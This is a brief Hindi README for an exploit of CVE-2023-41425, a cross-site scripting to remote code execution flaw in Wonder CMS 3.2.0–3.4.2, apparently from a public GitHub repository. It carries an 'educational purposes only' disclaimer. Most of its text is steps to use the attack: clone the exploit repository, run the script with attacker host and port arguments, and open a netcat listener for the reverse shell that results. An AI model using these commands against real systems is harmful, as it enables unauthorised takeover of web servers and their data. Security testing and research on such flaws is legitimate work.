
CVE-2023-41425 - Wonder CMS v.3.2.0 से v.3.4.2 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को installModule घटक पर अपलोड की गई एक क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
Wonder CMS v.3.2.0 से v.3.4.2 में क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को installModule घटक पर अपलोड की गई एक क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। केवल शैक्षिक उद्देश्यों के लिए
इसके लिए loginURL का ज्ञान, एडमिन एक्सेस या एडमिन को XSS लिंक पर क्लिक करवाने की क्षमता आवश्यक है।
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

भेद्यता की खोज और रिपोर्ट करने के लिए prodigiousMind